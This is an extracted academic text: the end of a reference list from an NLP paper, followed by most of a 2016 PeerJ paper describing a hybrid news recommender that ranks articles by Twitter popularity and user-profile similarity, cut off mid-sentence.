Intelligence, pages 22–27. Chris Callison-Burch, Philipp Koehn, Christof Monz, and Omar F Zaidan. 2011. Findings of the 2011 work- shop on statistical machine translation. In Proceedings of the Sixth Workshop on Statistical Machine Transla- tion, pages 22–64. David Chiang. 2007. Hierarchical phrase-based transla- tion. Computational Linguistics, (2):201–228. Trevor Cohn and Mirella Lapata. 2009. Sentence com- pression as tree transduction. Journal of Artificial In- telligence Research (JAIR), 34:637–674. Anthony Fader, Luke Zettlemoyer, and Oren Etzioni. 2013. Paraphrase-driven learning for open question answering. In Proceedings of the 51th Annual Meet- ing of the Association for Computational Linguistics (ACL), pages 1608–1618. Michel Galley, Mark Hopkins, Kevin Knight, and Daniel Marcu. 2004. What’s in a translation rule? In Proceedings of the 2004 Human Language Technol- ogy Conference of the North American Chapter of the Association for Computational Linguistics (HLT- NAACL), pages 273–280. Michel Galley, Jonathan Graehl, Kevin Knight, Daniel Marcu, Steve DeNeefe, Wei Wang, and Ignacio Thayer. 2006. Scalable inference and training of context-rich syntactic translation models. In Proceed- ings of the 44th Annual Meeting of the Association for Computational Linguistics (ACL), pages 961–968. Juri Ganitkevitch, Chris Callison-Burch, Courtney Napoles, and Benjamin Van Durme. 2011. Learning sentential paraphrases from bilingual parallel corpora for text-to-text generation. In Proceedings of the 2011 Conference on Empirical Methods in Natural Lan- guage Processing (EMNLP), pages 1168–1179. Asso- ciation for Computational Linguistics. Juri Ganitkevitch, Benjamin Van Durme, and Chris Callison-Burch. 2013. PPDB: The paraphrase database. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Tech- nologies, pages 758–764, Atlanta, Georgia, June. As- sociation for Computational Linguistics. Ruifang Ge and Raymond J Mooney. 2009. Learning a compositional semantic parser using an existing syn- tactic parser. In Proceedings of the Joint Conference of the 47th Annual Meeting of the ACL and the 4th International Joint Conference on Natural Language Processing of the AFNLP: Volume 2-Volume 2, pages 611–619. Peter Gurský, Tomás Horváth, Peter Vojtás, Jozef Jirásek, Stanislav Krajci, Robert Novotny, Jana Pribolová, and Veronika Vaneková. 2009. User preference web search – experiments with a system connecting web and user. Computing and Informatics, 28(4):515–553. Kenneth Heafield, Philipp Koehn, and Alon Lavie. 2013. Grouping language model boundary words to speed k- best extraction from hypergraphs. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Computational Linguistics: Hu- man Language Technologies, pages 958–968. Kenneth Heafield. 2011. KenLM: faster and smaller lan- guage model queries. In Proceedings of the 2011 Con- ference on Empirical Methods in Natural Language Processing (EMNLP), pages 187–197. Philipp Koehn. 2004. Statistical significance tests for machine translation evaluation. In Proceedings of the 2004 Conference on Empirical Methods in Natural Language Processing (EMNLP). Tom Kwiatkowski, Eunsol Choi, Yoav Artzi, and Luke Zettlemoyer. 2013. Scaling semantic parsers with on-the-fly ontology matching. In Proceedings of the 2013 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 1545–1556. Johannes Leveling. 2010. A comparative analysis: QA evaluation questions versus real-world queries. In Pro- ceedings of the 7th International Conference on Lan- guage Resources and Evaluation (LREC). Peng Li, Yang Liu, and Maosong Sun. 2013. An ex- tended GHKM algorithm for inducing lambda-SCFG. In Proceedings of the 27th Association for Advance- ment of Artificial Intelligence, pages 605–611. Percy Liang, Michael I. Jordan, and Dan Klein. 2011. Learning dependency-based compositional semantics. In Proceedings of the 49th Annual Meeting of the As- sociation for Computational Linguistics (ACL), pages 590–599. Nitin Madnani, Necip Fazil Ayan, Philip Resnik, and Bonnie Dorr. 2007. Using paraphrases for parameter tuning in statistical machine translation. In Proceed- ings of the Workshop on Statistical Machine Transla- tion (WMT07), Prague, Czech Republic. Kathleen R. McKeown. 1983. Paraphrasing questions using given and new information. Computational Lin- guistics, 9(1):1–10. Scott Miller, Robert Bobrow, Robert Ingria, and Richard Schwartz. 1994. Hidden understanding models of natural language. In Proceedings of the 32nd Annual Meeting of the Association for Computational Linguis- tics (ACL), pages 25–32. Graham Neubig, Taro Watanabe, Eiichiro Sumita, Shin- suke Mori, and Tatsuya Kawahara. 2011. An unsuper- vised model for joint phrase alignment and extraction. In Proceedings of the 49th Annual Meeting of the As- sociation for Computational Linguistics: Human Lan- guage Technologies (HLT-ACL), pages 632–641. Graham Neubig, Philip Arthur, and Kevin Duh. 2015. Multi-target machine translation with multi- synchronous context-free grammars. In Meeting of the North American Chapter of the Association for Com- putational Linguistics (NAACL), Denver, USA, May. Graham Neubig. 2013. Travatar: A forest-to-string ma- chine translation engine based on tree transducers. In ACL (Conference System Demonstrations), pages 91– 96. Franz Josef Och and Hermann Ney. 2003. A system- atic comparison of various statistical alignment mod- els. Computational Linguistics, (1):19–51. Hoifung Poon and Pedro Domingos. 2009. Unsuper- vised semantic parsing. In Proceedings of the 2009 Conference on Empirical Methods in Natural Lan- guage Processing (EMNLP), pages 1–10. Hassan Sajjad, Patrick Pantel, and Michael Gamon. 2012. Underspecified query refinement via natural language question generation. In Proceedings of the 24th International Conference on Computational Lin- guistics (COLING), pages 2341–2356. Milad Shokouhi, Rosie Jones, Umut Ozertem, Karthik Raghunathan, and Fernando Diaz. 2014. Mobile query reformulations. In Proceedings of the 37th In- ternational ACM SIGIR Conference on Research & Development in Information Retrieval, pages 1011– 1014. Chenguang Wang, Nan Duan, Ming Zhou, and Ming Zhang. 2013. Paraphrasing adaptation for web search ranking. In Proceedings of the 51th Annual Meeting of the Association for Computational Linguistics (ACL), pages 41–46. Yuk Wah Wong and Raymond J Mooney. 2006. Learn- ing for semantic parsing with statistical machine trans- lation. In Proceedings of the 2006 Human Language Technology Conference of the North American Chap- ter of the Association for Computational Linguistics (HLT-NAACL), pages 439–446. Yuk Wah Wong and Raymond J Mooney. 2007. Learn- ing synchronous grammars for semantic parsing with lambda calculus. In Proceedings of the 45th Annual Meeting of the Association for Computational Linguis- tics (ACL), number 1, pages 960–967. Xiaobing Xue and W. Bruce Croft. 2013. Modeling re- formulation using query distributions. ACM Transac- tion on Information Systems, (2):6:1–6:34. John M. Zelle and Raymond J. Mooney. 1996. Learn- ing to parse database queries using inductive logic pro- gramming. In Proceedings of the 13th National Con- ference on Artificial Intelligence, pages 1050–1055. Luke S Zettlemoyer and Michael Collins. 2005. Learn- ing to map sentences to logical form: Structured clas- sification with probabilistic categorial grammars. Un- certainty in Artificial Intelligence (UAI), pages 658– 666. Luke S Zettlemoyer and Michael Collins. 2007. On- line learning of relaxed CCG grammars for parsing to logical form. In Proceedings of the 2007 Joint Confer- ence on Empirical Methods in Natural Language Pro- cessing and Computational Natural Language Learn- ing (EMNLP-CoNLL), pages 678–687. work_p4f7mjg22ravlpruv2gop7ixge ---- Incorporating popularity in a personalized news recommender system Incorporating popularity in a personalized news recommender system Nirmal Jonnalagedda, Susan Gauch, Kevin Labille and Sultan Alfarhood Computer Science and Computer Engineering, University of Arkansas, Fayetteville, Arkansas, United States ABSTRACT Online news reading has become a widely popular way to read news articles from news sources around the globe. With the enormous amount of news articles available, users are easily overwhelmed by information of little interest to them. News recommender systems help users manage this flood by recommending articles based on user interests rather than presenting articles in order of their occurrence. We present our research on developing personalized news recommendation system with the help of a popular micro-blogging service, “Twitter.” News articles are ranked based on the popularity of the article identified from Twitter’s public timeline. In addition, users construct profiles based on their interests and news articles are also ranked based on their match to the user profile. By integrating these two approaches, we present a hybrid news recommendation model that recommends interesting news articles to the user based on their popularity as well as their relevance to the user profile. Subjects Agents and Multi-Agent Systems, World Wide Web and Web Science Keywords Twitter, Personalized news recommendation, News recommender systems, User profile INTRODUCTION Owing largely to the ever-increasing volume and sophistication of information on the web, we are able to access an enormous amount of data from around the globe. The downside of this information explosion is that users are often overwhelmed by information of little interest to them. The key challenge for the users is to find relevant information based on their interests. This problem has led to the evolution of recommender systems that help users find the information they need, based on their interests. Recommender systems proactively present users with information related to their interests rather than requiring the user to search for, and then filter through, information based on explicit queries. Many organizations use recommender systems to recommend various types of products to the user. For example, Netflix recommends movies to its users based on the user’s movie ratings compared to other similar users’ ratings. Amazon recommends various types of products such as gadgets, books, or movies and Pandora Radio recommends music based on a user’s past history and preferences. In addition, news recommender systems that recommend news articles from around the globe have become popular. There are many online news services such as Google News and Yahoo News. However, with plenty of news available, the driving problem is to identify and recommend the most interesting articles to each user so that they are not swamped by irrelevant How to cite this article Jonnalagedda et al. (2016), Incorporating popularity in a personalized news recommender system. PeerJ Comput. Sci. 2:e63; DOI 10.7717/peerj-cs.63 Submitted 10 March 2016 Accepted 9 May 2016 Published 6 June 2016 Corresponding author Susan Gauch, sgauch@uark.edu Academic editor Jason Jung Additional Information and Declarations can be found on page 20 DOI 10.7717/peerj-cs.63 Copyright 2016 Jonnalagedda et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.63 mailto:sgauch@uark.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.63 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ information. These articles should be related to each user interests but also include those news stories that are generating a lot of interest around the globe. News recommender systems are broadly classified into two types, content-based filtering and collaborative filtering. Content-based filtering methods are based on the information and attributes of the product that is being recommended. This approach focuses on analyzing user’s past interest to make future recommendations. Essentially, it recommends products whose contents are similar to the contents of previously viewed products that the user has rated highly. Content-based filtering has some limitations. It can be difficult for the system to learn and understand user preferences from the user’s behavior. However, for some products, it is possible to extract features that have semantic meaning. A popular service that uses this approach is Pandora Radio that uses the properties of a song or artist in order to select a station that plays music with similar attributes. User feedback is used to refine the station’s results based on whether the user likes or dislikes the song. On the other hand, collaborative filtering is a method based on information about the actions of other users whose preferences are similar to the existing user. This method studies the pattern of other user’s behavior rather than extracting features from the product. The key advantage of this approach is that prior analysis and understanding of the existing data is not required to make recommendations to the user. However, these systems need a large amount of data from various users in order to make recommendations. Amazon is a popular service that uses item to item (people who buy ‘x’ also buy ‘y’) collaborative filtering to recommend products based on other user purchases and reviews. Other popular examples that use this approach are the social networking sites that recommend new friends, groups and other social connections to the user. In this paper, we develop a hybrid personalized news recommender system that recommends interesting news articles to the user using a micro-blogging service “Twitter.” Our news recommender system ranks the articles in different ways: (1) We consider the user’s profile to recommend articles to the user; and (2) we also consider the article’s popularity with the help of tweets from Twitter’s public timeline. This paper presents a novel approach to help users find interesting articles to read by merging the above two methods of selecting articles. The next section reviews the relevant literature followed by a section explaining the design and implementation of the news recommender system. We continue with a section describing the evaluation of our system and a discussion and analysis of the results of the experiments conducted. We conclude with a summary of the research and briefly outline future work. LITERATURE REVIEW Recommender systems Recommender systems are widely used to help readers filter through an ever-growing flood of information. These systems implement an information filtering method to select products from a stream of information. Also, recommender systems collect data from users explicitly or implicitly and, based on the collected information, create user profiles. Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 2/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ The user profiles are then used to generate recommendations. With explicit information collection, the user typically rates items in addition to his regular tasks. For example, in addition to purchasing an item, the user is asked to rate it with one or more stars. However, with implicit information collection, the recommender system monitors the user’s behavior with items during their normal activities. No extra user effort is required. However, the system must infer the user’s preferences from their actions. Recommender systems have been considered as a remedy to overcome the information explosion problem and a lot of research effort has been focused on developing highly reliable recommendation techniques. Traditional recommender systems are classified based on what information they use and on how they use that information (Tuzhilin & Adomavicius, 2005). Recommender systems are classified into three categories, based on how the recommendations are made (Balabanovic & Shoham, 1997). 1. Content-based recommender systems: These recommender systems recommend an item to the user similar to the ones the user preferred in the past. 2. Collaborative recommender systems: These systems recommend an item to the user based on the people with similar tastes and preferences have liked in the past. They have the advantage that they can recommend items for which little or no semantic information is available (music, movies, books). 3. Hybrid recommender systems: These systems combine both the collaborative and content-based recommendation techniques in order to improve the accuracy of the recommendation. The information gathered from either content-based or collaborative filtering approaches can be used for either memory-based or model-based algorithms. Memory- based systems calculate recommendations on-the-go based on the previous user behavior. On the other hand, model-based systems are developed using data mining and machine learning algorithms to find patterns based on training data (Su & Khoshgoftaar, 2009). These systems incorporate algorithms such as Bayesian networks, clustering models, and semantic models to make predictions for real data from the training model to make recommendations. Memory-based systems are easy to implement, work well in real-time, and new data can be added easily and incrementally. However, this technique can become computationally expensive and the performance is affected when data is either sparse or dense. Also, these systems are dependent on human ratings and have limited scalability for large datasets. Model-based systems better address the scarcity, scalability, and other problems faced by memory-based systems. These systems not only improve the prediction performance but also give and intuitive rationale for recommendations. Model-based systems have a more holistic goal to uncover latent factors that explain observed ratings (Koren, 2010). However, the downsides of the model-based systems are expensive model building and loss of useful information caused by dimensionality reduction techniques. Some applications implement a hybrid model that fuses both these models to overcome the limitations such as scarcity and loss of information. The goal of these hybrid systems is to Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 3/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ improve the prediction performance and to overcome the limitations faced by the model- based and memory-based approaches. However, these systems have increased complexity and are expensive to implement (Das et al., 2007). Content-based recommender systems Content-based recommender systems are based on information about and attributes of the items that are going to be recommended. In other words, these systems recommend items that are similar to those items in which the user has shown interest in the past. The items are recommended based on the comparison between the item contents and user interests. These recommender systems are used in various domains such as web sites, web blogs, restaurants, news articles etc. The user profile is built based on his interests and this profile indicates the type of items that the user likes. Several techniques have been implemented to identify the items matching the user profile to make recommendations. Most traditional content-based recommender systems depend on features extracted from the content of the items themselves. The features associated with the items are then matched with the user’s profile to make recommendations. This approach is most commonly used by applications whose items have sufficient associated text from which keywords can be extracted. Recommendations are done based on the similarity of keywords associated with the items and the keywords associated with the user profile. The user profile’s keywords can be manually supplied (explicit) or identified by mining keywords from items viewed, liked, or purchased by the user (implicit). Content-based recommenders primarily use a weighting mechanism to rank the items by assigning weights to the keywords and to differentiate between the items. The keywords are extracted from the contents of the items that the user has shown interest in the past. These keywords form the basis for the user profile. If a user likes an item, the weights of the terms extracted from the item’s content are updated to the weights of the corresponding terms in the user profile. The items recommended in the future are primarily based on the user profile. There are several methods to calculate the weights of the keywords in the content. The most commonly used method is the Term Frequency - Inverse Document Frequency (TF-IDF) method. Examples of the earliest traditional content-based recommender systems include (Lang, 1995; Krulwich & Burkey, 1996; Pazzani, Muramatsu & Billsus, 1996). Lang (1995) implemented a Netnews filtering system, “Newsweeder,” that addresses the user profile building problem by letting the user enter his or her interest level for each article being read. The goal of an information filtering system is to sort through large volumes of information and present to the user those documents that are likely to satisfy his or her information requirement. Lang (1995) used two approaches TF-IDF and Minimum Description Length (MDL) for term weights. Two metrics were used to evaluate the performance. One metric was precision that calculated the ratio of relevant documents retrieved to all documents retrieved. The other was the confusion matrix of error generated by text in which the column of the matrix represents the instances in a predicted class, while each row represents the instances in an actual class. He found that MDL approach outperformed the traditional TF-IDF approach. Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 4/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ Krulwich & Burkey (1996) and Pazzani, Muramatsu & Billsus (1996) conducted similar work by developing intelligent information agents in their Information Finder system that recommended information such as news, bulletin boards, databases, etc., and Syskill & Webert that recommended movies, respectively. These intelligent agents incorporate traditional content-based filtering approaches to make recommendations. These agents recommend items that match the contents of the user profiles. The user profile is built based on the user’s interest and preferences in the past through explicit rankings, and this profile forms the basis for these agents to find items that are interesting to the user. Mooney and Roy (2000) developed a next-generation content-based recommender system that utilizes information extraction and a machine-learning algorithm for text categorization. Their prototype system, Learning Intelligent Book Recommending Agent (LIBRA), uses a database of book information extracted from web pages at Amazon.com. They performed a subject search on the Amazon website to obtain a list of book- description URLs that are published on subjects of broad interests. LIBRA then downloads each of these pages and uses a simple pattern-based information-extraction system to extract all the information pertaining to the book such as author, title, publications, related authors, etc. Preprocessing is performed on the information gathered for the removal of stop-words and formatting to obtain unique tokens. The content associated with the synopses, published reviews and customer comments were clustered into a single attribute called description. The system was trained by querying on specific authors and titles to retrieve relevant books. The books retrieved were presented to the users who were asked to rate their interest in the book. These user-book ratings form the explicit input on which to build the user profile. The system then learns a profile of the user using a Bayesian learning algorithm and produces a ranked list of the most recommended additional titles from the system’s catalog. Next, the classifier was used to predict the user rankings for the remaining books. Finally, the top-scoring books were recommended to the user. Also, the system adapts to the changing interests of the user and produces new recommendations based on the information collected from the user. LIBRA was evaluated on several data sets. Experiments were conducted on the book recommendations and two different users rated the books. The performance of the system was analyzed using a 10-fold validation experiment for varying number of training documents. The results indicated that the top recommendations by LIBRA were found interesting to the users when compared to randomly selected documents. The results also implied that performance was still high despite considering very few training examples. In more recent work, Kang, Doornenbal & Schijvenaars (2015) introduced the Elsevier journal finder. The proposed service is a content-based recommender system that recommends Elsevier journals that have published papers related to the one an author is willing to submit. It covers all major scientific domains available in the Elsevier database and about 2,900 per-reviewed journals. The system typically uses natural language processing (NLP) techniques to generate noun phrases features from papers which will then be used to do the matching. They are extracted using pattern of part-of-speech tag sequences and are represented using the Backus-Naur-form. After being extracted, the Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 5/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ noun phrases are mined and normalized by the Elsevier Fingerprint Engine (EFE) which consist of several NLP techniques used to generate relevant annotations (sentence boundaries, tokens, part-of-speech tag, phrase chunking : : : ). The well-known Okapi BM25 algorithm is used to do the matching between the submitted query and the papers in the database, but instead of using bag-of-words as input they use the previously generated noun phrase annotations. As an output, they produce a list of ranked paper along with their respective Bm25 score. Finally, they compute an average BM25 score for each journal by averaging the score of all papers published in this journal. Tkalcic et al. (2013) introduce a content-based recommender system for images that uses affective labeling of multimedia content. The system uses emotion detection techniques and a k-nearest neighbor machine learning algorithm to create affective labels. Collaborative recommender systems Collaborative recommender systems are the best-known and most widely used recommenders. Examples of organizations that use collaborative recommender systems are Amazon, YouTube, and Reddit. A profile is created for each user (item) according to the similarity of other users (item) in the system. According to the profiles, collaborative filtering recommender systems recommend items to target users according to the preferences of their similar users. There are two major types of algorithms for collaborative filtering: user-based and the item-based. User-based algorithms find out the most similar neighbor users to a target user based on the similarity of ratings. The products having the highest ratings from the neighbors are recommended to the target user (McNee et al., 2002). Essentially, if the target user and the neighbor both like some items in common, then the target user is likely to like other items that their neighbor has liked that the target user has not yet purchased and/or rated. For item-based algorithms, when a user is interested in an item, similar items are also recommended to the user (Yu & Zhang, 2012; Sarwar et al., 2001). Item similarity is based on items that are commonly purchased/liked together. If, in the past, people who like Star Wars also like Lord of the Rings, then a new user who has watched Star Wars should have Lord of the Rings recommended to them. Traditional collaborative recommender systems incorporate similar steps in order to make recommendations to the user. First, the user-item rating information is collected. Each user is provided with a collection of items for him to rate according to his interests. Each user is thus represented by item-rating pairs, which contains the ratings provided by the user to several items. Next, vectors are created that represent users or items and a similarity measure is chosen. There are several possible measures to calculate the similarity between two vectors. Pearson correlation, cosine vector similarity, mean-squared difference and Spearman correlation are some of the most commonly used metrics to measure the similarity between pairs of vectors. The next task is to identify the neighboring users who will serve as recommenders. There are two general techniques, threshold-based and top-n. With the threshold-based selection, vectors whose similarity exceeds a certain threshold value are considered as neighbors of the target user. In contrast, with the top-n technique, the n-closest neighbors Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 6/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ are selected for a given value of n. Finally, predictions are produced by calculating the weighted average of the neighbors’ ratings, weighted by their similarity to the target user. Examples of the earliest traditional collaborative recommender systems include GroupLens (Resnick et al., 1994) and Bellcore’s video recommendation system (Hill et al., 1995) that recommended news articles and videos to, respectively. Although successful first approaches, these traditional collaborative recommender systems often faced challenges such as scarcity, scalability, and cold-start. Sparse data can be a problem because if you have a few thousand users but several million items, there may not be any users who have purchased the same items as a target user. Scalability is an issue because there may be millions of items and/or users and millions of transactions a day. Running machine-learning algorithms may be intractable, leading to a need to reduce features and/ or entities in the algorithm. The cold-start problem is one of the most difficult to deal with. When the first users interact with a new recommender system, there are no previous user preferences to exploit in order to generate any recommendations at all. To overcome the above-mentioned problems, Gong (2010) developed a collaborative recommender system based on user clustering and item clustering. Users are clustered based on their ratings on several items and each user’s cluster is associated with a cluster center. Based on the similarity between a target user and the cluster centroids, the nearest neighbors of target user can be found to make recommendations and predictions where necessary. By clustering users and items, data can be aggregated across users or items, alleviating the sparse data problem and leading to greater accuracy. By comparing users to clusters rather than all other users, this approach is more scalable than the traditional collaborative recommendation. The approach proposed by Gong (2010) is explained in detail below. First, users are clustered into groups using the k-means algorithm. The data sparsity problem faced by other collaborative recommender systems is overcome by the explicit use of the item clusters as prediction mechanisms. Based on the results of item clustering, predictive strategies are applied to supply missing data. Next, item clustering is implemented to identify the items with similar user ratings. The items are clustered in a manner similar to the user clustering technique. Next, the cluster centers and the neighbors are identified. From the information gathered, the weighted average of the neighbors’ ratings is calculated, weighted by their similarity to the target item to produce recommendations to the users. Gong (2010) created a dataset containing 100,000 ratings from 1,000 users on 1,680 movies with every user providing at least 20 ratings. The ratings were on a numeric five- point scale with 1 and 2 representing negative ratings, 4 and 5 representing positive ratings, and 3 indicating ambivalence. Several metrics such as the mean absolute error, root mean square error and correlations between ratings and predictions are used for the purpose of evaluation and to deduce conclusions. The results indicated that his algorithm outperformed traditional collaborative recommendation algorithms. Recently, Li et al. (2015) present Rank-GeoFM, a Point Of Interest (POI) recommender system that uses both context-aware and collaborative filtering techniques. Their approach differs from the traditional ones because they obtain geographical factorization Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 7/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ in a ranking based way. Moreover, by incorporating different types of context information and by using a stochastic gradient descent-based algorithm, they are able to address the data scarcity problem common to this type of recommender system. News recommender systems News recommender systems are widely used and are a promising research direction. With so many information sources, the Internet provides fast access to the millions of news articles around the globe. However, users need recommendations to help them find the most interesting articles from this flood of information. News recommender systems can be broadly classified into two types based on the type of recommendations made to the user. Some recommender systems take advantage of online social networking sites to provide interesting news articles to the user. Such recommendations are called popularity-based news recommendations since the articles are ranked based on their popularity identified from the social networking websites. Other recommender systems recommend interesting news articles to the user solely based on the user’s interests. Such recommendations are called profile-based news recommendations since they rank the news articles based on the user’s interests. The following two sections explore the applications based on the popularity based recommendation and profile- based recommendation techniques. Popularity based news recommender systems News recommender systems are widely used to help readers filter through an ever- growing flood of information. Many researchers focus on using real-time social networking sites such as Facebook, Google Plus, and Twitter to identify the most popular current news stories. Because they are instant and widely available, they provide a massive source of information on current events. However, because they are unmoderated, the quality of the information is variable. Jackoway, Samet & Sankaranarayanan (2011) discuss a method to determine which Twitter users are posting reliable information and which posts are interesting. Micro-blog posts can also be used as a way of identifying the popularity of certain events. Smyth et al. represent users and items based on micro-blogging reviews of movies and used this technique with various movie recommendation strategies on live-user data (Esparza, O’Mahony & Smyth, 2010). Phelan, McCarthy & Smyth (2009) focus on using micro-blogging activity to recommend news stories. Their recommender system, Buzzer, is applied to RSS feeds to which the users have subscribed. Buzzer mines terms from RSS and Twitter feeds and uses them to rank articles. Phelan et al. (2011a) and Phelan et al. (2011b), they extended their work by considering the public- rank and the friends-rank strategy rather than just considering the articles from the users’ index. Profile-based news recommender systems Profile-based, or personalized, news recommender systems recommend articles to the user based solely on his/her interests. A user profile is built based on the preferences or interests of the user. In one of the earliest news recommendation systems, Pazzani, Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 8/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ Muramatsu & Billsus (1996) created News Dude, a personal news-recommending agent that uses TF-IDF in combination with a Nearest Neighbor algorithm in order to recommend news stories to users (Billsus & Pazzani, 1999). They developed a hybrid user model that considers both long-term and short-term interests and found out that this model outperformed the models that consider either of these interests. Similarly, Li et al. (2014) described a content-based recommender system that recommends news articles to a user based upon the user’s short-term and long-term reading preferences. The work from Abel et al. (2011) presents a good correlation between user profile features and its relative efficiency for recommendations. They evaluate and compare three different strategies for building user profile upon Tweeter stream. The three types of user profile are: entity-based user profiles, hashtag-based user profiles, and topic-based user profiles. They concluded that entity-based user profiles are the most valuable profiles and that they are a better fit for recommendation purposes. They then used this type of profile in their personalized news recommender system. Recently, Oh et al. (2014) proposed an innovative recommender system to recommend personalized news stories using content-based analysis of tweets in Twitter. In their work, they first build a user profile by extracting keywords from the content of tweets, re-tweets and hashtags. A keyword classifier based on deep neural network analysis is being used to classify interesting keywords. Then, they recommend news articles to the user using topic modeling techniques as well as TF-IDF. Our news recommender system incorporates both the strategies explained above, popularity and conceptual user profiles, to present a novel hybrid approach to recommend news articles to the user that are both relevant to their interests and popular with a wide audience. APPROACH In this section, we present an overview of our hybrid news recommendation system. Our basic approach is to recommend interesting news articles to the user based on a combination of his past interests and stories that are currently of broad interest. The user’s interests are captured in his user profile and the community as a whole’s broad interest is captured from tweets collected from Twitter’s public timeline. Finally, our intuition is that users most want to see news stories related to topics in their profile that are also creating a buzz on the blogosphere. In other words, users are shown hot stories related to their favorite topics. High-level design Figure 1 shows an architectural diagram of our hybrid news recommender system. The hybrid system consists of three modules: 1. Popularity-Based News Recommender 2. Profile-Based News Recommender 3. Hybrid News Recommender Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 9/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ Each module implements a different approach to selecting the news articles to recommend to the user. The first module selects news articles based on the popularity of the article. The popularity of the article is identified with the help of tweets from the Twitter’s public. Articles that are mentioned frequently in the tweets are considered “hot” or popular. This recommender module ranks the articles based on their overall popularity. The second module ranks the news articles based on their similarity to a user’s profile. The news articles are ranked based on their similarity between the categories in the user’s profile and the categories to which the article belongs. The third module fuses the results from the above to modules to recommend interesting news articles to the user. The articles are ranked based on a combination of their popularity ranking and the similarity to the user’s profile. In contrast to the first module that recommends “hot” articles that are of interest to the world at large and the second module that recommends articles related to the user’s profile regardless of their popularity, this module recommends “hot” articles that are relevant to topics interesting to the user. Popularity-based news recommender system Figure 2 shows an architectural diagram of the popularity-based news recommender system. First, the RSS articles are collected from a news source such as CNN or the BBC and stored in the file system. These websites organize their stories by category, e.g., Sports, Business, Politics, and Entertainment etc. The file system stores all the articles organized into folders based on the category to which they belong. The RSS articles are pre- processed to remove unnecessary content (html tags, numbers, etc.) while preserving the textual content. Figure 1 Architecture of the hybrid news recommender system. Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 10/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ The pre-processed articles are then indexed by SOLR, an open source enterprise search platform from the Apache Lucene project (Apache SOLR; http://lucene.apache.org/solr/). SOLR uses the Lucene Java search library at its core for indexing and search, and it has several APIs that make it flexible to use from any programming language. SOLR is comprised of three main components, an indexer, a Lucene index and a server. The indexer is responsible for collecting all the pre-processed articles from the Article Collection and creating a Lucene index over them. The Lucene index is a file-based inverted file that supports fast lookup by document content. The SOLR Apache server works on top of this Lucene index developed by the indexer. Any requests must be made to the server that outputs results based on the underlying index. All the queries are submitted to the server which outputs the documents based on the index. Figure 3 diagrams the SOLR architecture. In order to identify which news stories are most popular, we also collect data from the Twitter micro-blogging site. The Tweet Collector collects the tweets from Twitter’s public timeline via the Twitter’s streaming API. The collected tweets are stored in the Tweet Collection in JSON format. The Tweet Processor is responsible for parsing the Tweet Figure 2 Architecture of the popularity-based news recommender. Figure 3 SOLR architecture. Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 11/22 http://lucene.apache.org/solr/ http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ Collection by eliminating unwanted noise and preserving the tweet content. Each processed tweet is queried against the server to retrieve the articles that match the tweet contents. SOLR returns articles, and weights, based on how well each article matches the tweet according to the cosine similarity value. The weights for each article are accumulated across all tweets to produce a popularity weight for the article. Thus, the Popularity_Wt for article i is the sum of the cosine similarity of all matching current tweets: Popularity Wti ¼ X t 2 T cosineSimilarity Articlei; Tweettð Þ where T is the number of tweets collected Articlei is the news article whose popularity is being calculated Tweett is the tweet being matched against the article Profile-based news recommender system In this section, we describe the profile-based news recommender system which is used as a baseline later on for evaluating the effectiveness of our different approaches. This system is comprised of four components and each component is explained in detail in the following paragraphs. Figure 4 shows the architectural diagram of the Profile-Based News Recommender system. The profile-based recommender system uses the same article collection as the popularity-based recommender system. Although articles are placed in only one category by the website editor, they may actually partially belong to more than one category. Figure 4 Architecture of the profile-based recommender system. Jonnalagedda et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.63 12/22 http://dx.doi.org/10.7717/peerj-cs.63 https://peerj.com/ To allow for this, each article is classified into all 7 potential categories using a k-nearest neighbor classifier (Shiwen, Baoli & Qin, 2004), the classification module of the KeyConcept project (Gauch, Ravindran & Chandramouli, 2010). This tool classifies the articles to categories based on the article’s similarity to training documents for each category. The k-nearest neighbors classification approach identifies the k most similar training documents to the article then uses those similarity scores as votes for the category to which the training documents belong. The similarity of the article to each category is thus the sum of the scores of the article’s similarity to the training documents in that category that fall in the top k most similar documents overall. These categories are then sorted based on their accumulated scores. We store the top 3 most similar categories (and their similarity scores) for use in profile matching. In order to do fast lookup by category, we again use SOLR to build a second Lucene index that maps from category ids to document ids and weights. Next, each user creates his or her own profile by manually scoring the categories presented on a Web form. This user profile is used to identify documents that best match their profile. The profiles and the articles can be viewed as feature vectors where each category is a feature. The similarity of each article to the user’s profile is calculated using the inner product between the user profile’s category vector and the article’s category vector. Thus, for a given user j, the Personal_Wt for article i is: Personal Wtij ¼ CosineSimilarity ArticleProfilei; UserProfilej � � where ArticleProfilei is a vector of the weights for each category in the ontology for Articlei UserProfilej is a vector of the weights for each category in the ontology for Userj To implement this, we 